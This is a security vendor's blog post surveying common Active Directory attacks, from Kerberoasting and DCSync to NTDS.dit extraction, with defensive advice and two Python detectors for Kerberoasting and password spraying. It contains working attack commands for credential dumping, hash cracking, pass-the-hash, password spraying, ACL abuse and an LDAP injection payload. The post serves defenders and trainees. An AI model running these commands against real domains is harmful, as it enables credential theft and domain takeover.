Date: November 19, 2025
Author: Karan Patel, CEO

Active Directory (AD) remains the backbone of identity and access management in the vast majority of enterprise environments. It is also, without question, one of the most targeted attack surfaces in modern penetration testing and real-world intrusions. Whether you are a blue teamer trying to harden your environment or a red teamer sharpening your skills, understanding how AD breaks is essential.

This post walks through the most commonly exploited Active Directory vulnerabilities, with real commands, payloads, and technical depth. If you want hands-on training built around these exact scenarios, the courses at Redfox Cybersecurity Academy are designed specifically for practitioners who want to go beyond theory.

Why Active Directory Is Such a High-Value Target

AD is a centralized authentication and authorization system. Compromise it, and you often have the keys to the entire organization. Domain Controllers (DCs) hold the NTDS.dit database, which contains password hashes for every domain account. Group Policy Objects (GPOs) control what users and machines can do. Service accounts with excessive privileges are everywhere. Misconfigurations stack up quietly over years of growth and mergers.

The attack paths are well-documented, but organizations continue to fall to the same categories of vulnerabilities because fixing them is operationally complex. The red team services at Redfox Cybersecurity regularly identify these exact weaknesses during adversarial simulations across enterprise environments.

Kerberoasting

How It Works

Kerberoasting is one of the most prevalent AD attacks in the wild. Any authenticated domain user can request a Kerberos service ticket (TGS) for any account that has a Service Principal Name (SPN) registered. Part of that ticket is encrypted with a key derived from the service account's password (with RC4, etype 23 / 0x17, that key is simply the account's NT hash), so the ticket can be taken offline and cracked without any further interaction with the target service. Computer accounts have SPNs too, but their machine passwords are long and random, so the attack is aimed at user accounts with SPNs, which frequently carry human-chosen passwords and excessive privileges.

Attack Execution

Using Impacket's GetUserSPNs.py:

python3 GetUserSPNs.py -request -dc-ip 192.168.1.10 CORP.LOCAL/jsmith:Password123 -outputfile kerberoast_hashes.txt

This requests a service ticket for every user account with an SPN in the domain. The output file contains hashes in a format ready for hashcat; mode 13100 covers RC4 (etype 23) tickets, while AES tickets need mode 19600 (AES-128, etype 17) or 19700 (AES-256, etype 18) and crack far more slowly:

hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt --force -O

Defense

Enforce strong, randomly generated passwords (25+ characters) for all service accounts. Use Group Managed Service Accounts (gMSA) wherever possible; their passwords are 240 bytes of random data rotated automatically, which puts cracking out of reach. Remove SPNs that are no longer needed, and never run services under Domain Admin accounts. Monitor Event ID 4769 for unusual TGS requests, particularly those using RC4 encryption (etype 0x17) when your environment should be using AES, and for a single account requesting tickets for many different SPNs in a short burst. Ignore krbtgt and computer-account ($) service names in that rule to cut the noise.
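
As an added example, not part of the original post: a small Python detector that runs the two 4769 checks above over a handful of constructed 4769-style records (the users, SPNs and addresses are hypothetical). It drops krbtgt and computer-account service names, flags any RC4 (0x17) service ticket, and flags a requester that pulls tickets for three or more distinct SPNs inside five minutes, which is what a bulk GetUserSPNs run looks like on the wire.

```python
"""Kerberoasting detection over Windows Security Event ID 4769 records.

Added example, not code from the original post. The records below are
constructed to mirror the fields a SIEM would extract from a 4769 event
(TargetUserName, ServiceName, TicketEncryptionType, IpAddress); all names
and addresses are hypothetical.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Ticket Encryption Type values as logged in 4769.
RC4_HMAC = 0x17
AES128_CTS_HMAC_SHA1 = 0x11
AES256_CTS_HMAC_SHA1 = 0x12

# Constructed sample: jsmith requests RC4 tickets for four SPNs in two seconds
# (a bulk Kerberoast), amiller is normal AES traffic, bjones touches one
# legacy RC4-only service.
SAMPLE_4769 = [
    {"time": "2025-11-19T09:00:01", "user": "jsmith@CORP.LOCAL", "service": "svc_sql", "etype": RC4_HMAC, "ip": "10.0.5.23"},
    {"time": "2025-11-19T09:00:02", "user": "jsmith@CORP.LOCAL", "service": "svc_http", "etype": RC4_HMAC, "ip": "10.0.5.23"},
    {"time": "2025-11-19T09:00:02", "user": "jsmith@CORP.LOCAL", "service": "svc_backup", "etype": RC4_HMAC, "ip": "10.0.5.23"},
    {"time": "2025-11-19T09:00:03", "user": "jsmith@CORP.LOCAL", "service": "svc_sharepoint", "etype": RC4_HMAC, "ip": "10.0.5.23"},
    {"time": "2025-11-19T09:00:03", "user": "jsmith@CORP.LOCAL", "service": "WS01$", "etype": AES256_CTS_HMAC_SHA1, "ip": "10.0.5.23"},
    {"time": "2025-11-19T09:01:00", "user": "amiller@CORP.LOCAL", "service": "svc_sql", "etype": AES256_CTS_HMAC_SHA1, "ip": "10.0.7.40"},
    {"time": "2025-11-19T09:04:00", "user": "amiller@CORP.LOCAL", "service": "svc_http", "etype": AES256_CTS_HMAC_SHA1, "ip": "10.0.7.40"},
    {"time": "2025-11-19T09:30:00", "user": "amiller@CORP.LOCAL", "service": "krbtgt", "etype": AES256_CTS_HMAC_SHA1, "ip": "10.0.7.40"},
    {"time": "2025-11-19T10:00:00", "user": "bjones@CORP.LOCAL", "service": "svc_legacy", "etype": RC4_HMAC, "ip": "10.0.9.9"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def is_roastable_service(service_name):
    """Only user-account SPNs matter: krbtgt (TGT renewals) and computer
    accounts (random machine passwords) are noise for this detection."""
    return service_name != "krbtgt" and not service_name.endswith("$")


def kerberoast_alerts(events, window=timedelta(minutes=5), min_distinct_spns=3):
    """Return a list of alert dicts, ordered by (user, ip).

    Rule 1, rc4_service_ticket: any RC4 ticket for a user-account SPN. In an
    AES-capable domain this usually means the requester asked for RC4 (the
    GetUserSPNs/Rubeus default) or the service account has no AES keys.
    Rule 2, spn_burst: one requester obtaining tickets for at least
    min_distinct_spns distinct services inside `window`.
    """
    per_requester = defaultdict(list)
    for e in events:
        if is_roastable_service(e["service"]):
            per_requester[(e["user"], e["ip"])].append(e)

    alerts = []
    for (user, ip), evs in sorted(per_requester.items()):
        rc4_services = sorted({e["service"] for e in evs if e["etype"] == RC4_HMAC})
        if rc4_services:
            alerts.append({"rule": "rc4_service_ticket", "user": user, "ip": ip,
                           "services": rc4_services})

        evs.sort(key=_ts)
        for i, first in enumerate(evs):
            # Sliding window anchored on each event; evs is time-ordered.
            in_window = [e for e in evs[i:] if _ts(e) - _ts(first) <= window]
            distinct = sorted({e["service"] for e in in_window})
            if len(distinct) >= min_distinct_spns:
                alerts.append({"rule": "spn_burst", "user": user, "ip": ip,
                               "services": distinct,
                               "seconds": (_ts(in_window[-1]) - _ts(first)).total_seconds()})
                break  # one burst alert per requester is enough
    return alerts


if __name__ == "__main__":
    for alert in kerberoast_alerts(SAMPLE_4769):
        print(alert)
```

Tune min_distinct_spns against your own baseline: backup servers and monitoring agents legitimately touch many SPNs, so whitelist those requesters by account rather than raising the threshold for everyone.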

AS-REP Roasting

How It Works

AS-REP Roasting targets accounts that have "Do not require Kerberos preauthentication" enabled. Normally a client must first prove knowledge of the password (the encrypted timestamp in pre-authentication) before the KDC issues anything. Without preauthentication, the KDC returns an AS-REP whose encrypted part is protected with a key derived from the user's password, to anyone who asks for that username. This means you do not need valid credentials to pull crackable material, only a list of candidate usernames.

Attack Execution

python3 GetNPUsers.py CORP.LOCAL/ -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt -dc-ip 192.168.1.10

Then crack offline:

hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule

Defense

Audit accounts with preauthentication disabled using:

Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth

Enable preauthentication on all accounts unless there is a specific technical requirement. Log and alert on Event ID 4768 (TGT requested) where the Pre-Authentication Type is 0, and especially where the Ticket Encryption Type is 0x17 (RC4), which is what GetNPUsers requests by default so that the output cracks with hashcat mode 18200.

DCSync Attack

How It Works

DCSync abuses the Directory Replication Service (DRS) protocol. A Domain Controller replicates AD data to other DCs. If an account has the "Replicating Directory Changes All" and "Replicating Directory Changes" permissions on the domain naming context, it can ask a DC for replication data exactly as a peer DC would and pull NTLM hashes for any account, including krbtgt and Domain Admin accounts. This attack does not require code execution on the DC itself. By default only the DC computer accounts and the Administrators, Domain Admins and Enterprise Admins groups hold these rights; some products legitimately need them too (the Azure AD Connect synchronization account is the common case), which is why those accounts must be treated as Tier 0.

Attack Execution

Using Impacket's secretsdump:

python3 secretsdump.py CORP.LOCAL/domainadmin:Password123@192.168.1.10 -just-dc-user krbtgt

Or targeting all accounts:

python3 secretsdump.py CORP.LOCAL/domainadmin:Password123@192.168.1.10 -just-dc-ntlm

The krbtgt hash, once obtained, enables Golden Ticket attacks: forged TGTs that the KDC accepts as genuine. Because the KDC also honours tickets encrypted with the previous krbtgt key, a single password reset does not invalidate them; the account must be reset twice, with enough time between the resets for replication to complete, before existing forged tickets stop working.

Defense

Restrict replication rights aggressively. Audit the ACL on the domain naming context with BloodHound, the built-in dsacls tool, or the ActiveDirectory PowerShell module. Replication rights are extended rights, so a text match on ActiveDirectoryRights will not find them: filter on the rights GUIDs (DS-Replication-Get-Changes 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2, DS-Replication-Get-Changes-All 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2, DS-Replication-Get-Changes-In-Filtered-Set 89e95b76-444d-4c62-991a-0facbeda640c), on ExtendedRight with the all-zero GUID (every extended right), and on GenericAll, which implies all of them:

$replGuids = '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2','1131f6ad-9c07-11d1-f79f-00c04fc2dcd2','89e95b76-444d-4c62-991a-0facbeda640c'
(Get-Acl "AD:\DC=corp,DC=local").Access | Where-Object { $_.ObjectType.ToString() -in $replGuids -or ($_.ActiveDirectoryRights -match 'ExtendedRight' -and $_.ObjectType -eq [guid]::Empty) -or $_.ActiveDirectoryRights -match 'GenericAll' } | Select-Object IdentityReference, ActiveDirectoryRights, ObjectType, AccessControlType

Only Domain Controllers, the built-in administrative groups and explicitly approved Tier 0 service accounts (such as the Azure AD Connect account) should hold these rights. Flag any other principal immediately, and remember that anyone who can write the domain object's DACL can grant these rights to themselves, so WriteDACL and WriteOwner on the domain object belong in the same audit.

Pass-the-Hash (PtH)

How It Works

Windows authentication, particularly NTLM, allows authentication using the hash of a password rather than the plaintext. Once an attacker extracts an NTLM hash via lsass dumping, SAM database extraction, or secretsdump, they can authenticate as that user across the network without ever knowing the actual password.

Attack Execution

Using CrackMapExec for lateral movement with a hash:

crackmapexec smb 192.168.1.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c --local-auth

For a specific target using Impacket:

python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c Administrator@192.168.1.50

Defense

Put privileged accounts in the Protected Users security group. Members cannot authenticate with NTLM at all, cannot use RC4 for Kerberos and cannot be delegated, so their hashes are useless for PtH. Protected Users only covers domain accounts: the local Administrator hash reused across hosts in the example above is addressed by LAPS, which gives every machine a unique, rotated local administrator password so a hash taken from one workstation does not open the next. Implement Credential Guard via Virtualization-Based Security (VBS) to protect lsass. Enforce tiered administration models so that lateral movement with a workstation admin hash does not reach Domain Controllers.

LDAP Injection and Enumeration

How It Works

Applications that query Active Directory via LDAP often construct queries using user-supplied input without sanitization. Attackers can manipulate LDAP filters to extract unintended information, bypass authentication, or enumerate sensitive AD attributes. Even without injection, anonymous or low-privilege LDAP enumeration reveals enormous amounts of information about the domain structure.

Attack Execution

Unauthenticated LDAP enumeration with ldapsearch:

ldapsearch -x -H ldap://192.168.1.10 -b "DC=corp,DC=local" "(objectClass=user)" sAMAccountName userPrincipalName memberOf

For injection, consider an application that builds its login filter by string concatenation:

(&(sAMAccountName=INPUT)(userPassword=INPUT))

A username that closes the filter early turns the password check into trailing text:

Username: *)(&))
Password: anything

The resulting filter is (&(sAMAccountName=*)(&))(userPassword=anything)). The first complete expression, (&(sAMAccountName=*)(&)), matches every user because (&) is the always-true filter, and LDAP servers that stop parsing at the first complete filter ignore the rest. Depending on how the application handles a multi-entry result (first match, any match, or an error), this logs the attacker in as the first user returned or leaks the user list. Even where the directory does not expose userPassword to searches, the injected filter still controls which entries come back, which is why a credential check belongs in an LDAP bind as the user, not in a search filter.

Defense

Anonymous LDAP bind is off by default on Domain Controllers; verify it stays off (the seventh character of the dSHeuristics attribute controls it). Require LDAP signing and channel binding (KB4520412) to stop relay and man-in-the-middle abuse of LDAP. Neither setting stops an authenticated user from enumerating the directory, which any domain account can do by default, so treat LDAP enumeration the same as port scanning from an alerting perspective and look for hosts that pull the entire user and group population. On the application side, escape user input per RFC 4515 or use a library that builds filters for you, and verify passwords with a bind as the user rather than a filter match.

Unconstrained Delegation

How It Works

When a computer or service account is configured for unconstrained Kerberos delegation, it stores the Ticket Granting Ticket (TGT) of any user that authenticates to it. An attacker who compromises a system with unconstrained delegation can extract cached TGTs, including those of Domain Admins, and reuse them to impersonate those users across the domain.

Identifying Vulnerable Systems

Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primaryGroupID -ne 516} -Properties TrustedForDelegation, ServicePrincipalName

Domain Controllers are trusted for unconstrained delegation by design, so the primaryGroupID clause (516 is the Domain Controllers group) leaves them out and the list only shows servers that someone configured this way.

Get-ADUser -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation

Once on a compromised system with unconstrained delegation, Rubeus can monitor and extract incoming TGTs in real time:

Rubeus.exe monitor /interval:5 /nowrap

Combined with PrinterBug (MS-RPRN) or PetitPotam (MS-EFSRPC) to coerce a Domain Controller into authenticating to the compromised host, this yields the DC computer account's TGT, which is enough to run DCSync. The result is a direct path from a single delegating server to the whole domain.

Defense

Move away from unconstrained delegation entirely. Use constrained delegation or resource-based constrained delegation (RBCD) with explicit service restrictions. Domain Controllers and highly privileged systems should never be configured with unconstrained delegation. Mark privileged accounts as "Account is sensitive and cannot be delegated" or place them in Protected Users so their TGTs are never forwarded in the first place, and audit regularly using the PowerShell commands above.

ACL Abuse and Privilege Escalation via AD Permissions

How It Works

Every Active Directory object has an Access Control List. Over time, misconfigurations accumulate. A helpdesk account may have WriteDACL on a Domain Admin account. A service account may have GenericAll over an OU containing privileged users. These paths are not surfaced by ordinary administrative tooling, but they are trivially exploitable once mapped.

Enumerating with BloodHound

bloodhound-python -u jsmith -p Password123 -d corp.local -dc 192.168.1.10 -c All --zip

Once ingested into BloodHound, attackers look for shortest paths to Domain Admin. A common ACL abuse is adding a user to a privileged group via GenericWrite:

Add-DomainGroupMember -Identity "Domain Admins" -Members "jsmith" -Credential $cred

Or abusing WriteDACL to grant DCSync rights:

Add-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" -PrincipalIdentity jsmith -Rights DCSync

Defense

Run BloodHound in your own environment on a scheduled basis as a defensive tool. Audit all non-default ACL entries on sensitive AD objects, and remember that a path only needs one weak link: a right to add members to a group that nests into Domain Admins is as good as a right on Domain Admins itself. Use tiered administration and restrict who can modify high-value groups. The ADACLScanner PowerShell tool is also useful for bulk ACL reporting.

Password Spraying Against AD

How It Works

Domain environments often have lockout policies that trigger after a set number of failed attempts per account. Password spraying flips the model: one password, many usernames. By staying under the lockout threshold per account, attackers can test common passwords across the entire user population without triggering lockouts.

Attack Execution

Using CrackMapExec:

crackmapexec smb 192.168.1.10 -u users.txt -p 'Winter2026!' --continue-on-success

Or using Spray against OWA or ADFS endpoints:

python3 spray.py -u users.txt -p 'Welcome1' -s https://mail.corp.com/owa/ -t 10

Service desk reset patterns like Companyname@2026, Welcome1, and Season+Year combinations succeed far more often than organizations expect.

Defense

Implement Microsoft Entra Password Protection (formerly Azure AD Password Protection) or an on-premises equivalent to ban common and pattern-based passwords at the DC level. Enable Fine-Grained Password Policies to enforce stricter controls on privileged accounts. Deploy a SIEM rule that keys on the source rather than the account: many distinct accounts failing from one source (Event ID 4625 on the target, 4776 or 4771 on the DC depending on whether NTLM or Kerberos was used) inside a short window, with each account staying below the lockout threshold. A per-account lockout alert never fires on a well-paced spray; that is the whole point of the technique.
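
As an added example, not part of the original post: the per-source rule above in Python, run over constructed failed-logon records (the accounts, addresses, times and the lockout policy values are all assumptions). It shows the per-account lockout view returning nothing for a paced spray while the per-source view catches it, and it buckets by fixed ten-minute windows the way many SIEM correlation rules do.

```python
"""Password-spray detection over normalized failed-logon records.

Added example, not code from the original post. Records are constructed to
mirror what a SIEM normalizes from Event ID 4625 (failed logon on the target,
IpAddress field) or 4771/4776 on a DC; every account, address and time is
hypothetical. The lockout policy values are assumptions, set them to yours.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

LOCKOUT_THRESHOLD = 5                    # assumed "Account lockout threshold"
LOCKOUT_WINDOW = timedelta(minutes=30)   # assumed "Reset lockout counter after"
_EPOCH = datetime(1970, 1, 1)            # naive reference for bucket arithmetic


def _constructed_failed_logons():
    base = datetime(2025, 11, 19, 8, 15, 0)
    events = []
    # The spray: 10.0.5.23 tries one password against twelve accounts, five
    # seconds apart. Each account sees a single failure, far below lockout.
    sprayed = ["aadams", "bbrown", "cclark", "ddavis", "eevans", "ffoster",
               "ggarcia", "hhill", "iirwin", "jjones", "kking", "llee"]
    for i, account in enumerate(sprayed):
        events.append({"time": base + timedelta(seconds=5 * i), "event_id": 4625,
                       "account": account, "source": "10.0.5.23"})
    # Background noise: two users mistype their own password once.
    events.append({"time": base + timedelta(minutes=2), "event_id": 4625,
                   "account": "mmiller", "source": "10.0.7.40"})
    events.append({"time": base + timedelta(minutes=3), "event_id": 4625,
                   "account": "nnash", "source": "10.0.7.41"})
    # A single-account brute force that stops one attempt short of lockout.
    for i in range(LOCKOUT_THRESHOLD - 1):
        events.append({"time": base + timedelta(minutes=1, seconds=20 * i),
                       "event_id": 4625, "account": "administrator", "source": "10.0.9.9"})
    return events


SAMPLE_FAILED_LOGONS = _constructed_failed_logons()


def accounts_over_lockout(events, threshold=LOCKOUT_THRESHOLD, window=LOCKOUT_WINDOW):
    """Per-account view: accounts that would actually lock out. On a paced
    spray this returns nothing, which is why per-account alerts miss it."""
    by_account = defaultdict(list)
    for e in events:
        by_account[e["account"]].append(e["time"])
    locked = []
    for account, times in sorted(by_account.items()):
        times.sort()
        for i, t0 in enumerate(times):
            if sum(1 for t in times[i:] if t - t0 <= window) >= threshold:
                locked.append(account)
                break
    return locked


def spray_alerts(events, min_accounts=10, bucket=timedelta(minutes=10)):
    """Per-source view: tumbling windows of `bucket` length; alert when one
    source fails against at least min_accounts distinct accounts in a bucket."""
    per_bucket = defaultdict(Counter)
    for e in events:
        slot = (e["time"] - _EPOCH) // bucket      # integer bucket index
        per_bucket[(e["source"], slot)][e["account"]] += 1
    alerts = []
    for (source, slot), accounts in sorted(per_bucket.items()):
        if len(accounts) >= min_accounts:
            worst = max(accounts.values())
            alerts.append({"source": source,
                           "window_start": _EPOCH + slot * bucket,
                           "distinct_accounts": len(accounts),
                           "max_per_account": worst,
                           "under_lockout": worst < LOCKOUT_THRESHOLD})
    return alerts


if __name__ == "__main__":
    print("accounts that would lock out:", accounts_over_lockout(SAMPLE_FAILED_LOGONS))
    for alert in spray_alerts(SAMPLE_FAILED_LOGONS):
        print("spray:", alert)
```

In production the source is often a proxy, VPN concentrator or a single jump host, so baseline the distinct-account count per source before setting min_accounts, and correlate 4625 on member servers with 4776/4771 on the DCs so a spray against the DC directly is not missed.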

NTDS.dit Extraction

How It Works

NTDS.dit is the Active Directory database stored on every Domain Controller. It contains the NTLM password hashes, Kerberos keys, and password history for every domain account. The hashes inside it are encrypted with the Password Encryption Key (PEK), which is itself protected by the boot key held in the SYSTEM registry hive, so the file is only useful together with that hive. Direct access to both allows offline extraction of all credential material in the domain.

Attack Execution

Using a VSS shadow copy to get around the lock the running DC holds on the live file (ntdsutil's "ifm" media creation and secretsdump's -use-vss option against a DC reach the same data):

vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Temp\ntds.dit
reg save HKLM\SYSTEM C:\Temp\SYSTEM

Then extract offline with Impacket:

python3 secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

Defense

Restrict physical and RDP access to Domain Controllers. Monitor VSS shadow copy creation (Event ID 8222) and, with command-line auditing enabled, Event ID 4688 process creation for vssadmin.exe, ntdsutil.exe and diskshadow.exe on DCs; flag any shadow copy creation from non-standard processes or outside backup windows. Implement Privileged Access Workstations (PAWs) for all DC management. Tier 0 systems should have minimal attack surface and aggressive logging.

Key Takeaways

Active Directory vulnerabilities are not theoretical. They are consistently exploited across industries, from financial services to healthcare, in penetration tests and real breach investigations alike. The attack chains covered here, including Kerberoasting, DCSync, delegation abuse, and ACL exploitation, represent the core curriculum of any serious red team engagement.

Understanding these techniques is only part of the challenge. Operationalizing defenses, building detection logic, and running regular adversarial simulations to validate controls is what separates environments that get breached from those that catch attackers early.

If you are a security practitioner who wants structured, hands-on training covering these exact attack paths, Redfox Cybersecurity Academy at https://academy.redfoxsec.com offers courses built around real-world red team scenarios, not checkbox certifications.

If your organization needs a professional Active Directory security assessment or full adversarial simulation, the team at Redfox Cybersecurity delivers engagements grounded in the same techniques described in this post, with actionable remediation guidance tailored to your environment.
